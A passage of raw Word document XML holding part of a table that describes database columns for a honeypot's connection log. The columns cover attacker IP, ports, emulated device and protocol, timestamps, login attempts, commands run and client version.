              <w:t xml:space="preserve">ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL, INDEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker address.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">src_port, dst_port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">INTEGER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker source port and honeypot port.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">device, protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Emulated device and protocol of the connection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">started_at, ended_at</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TIMESTAMPTZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ended_at NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Connection start and end (NULL while active).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">auth_attempts, login_success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">INTEGER, BOOLEAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">DEFAULT 0 / FALSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Logins tried and whether one succeeded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">username, commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT, INTEGER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Accepted user name and number of commands run.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">client_version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH client banner, MQTT client id or HTTP user agent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">meta</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">JSONB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
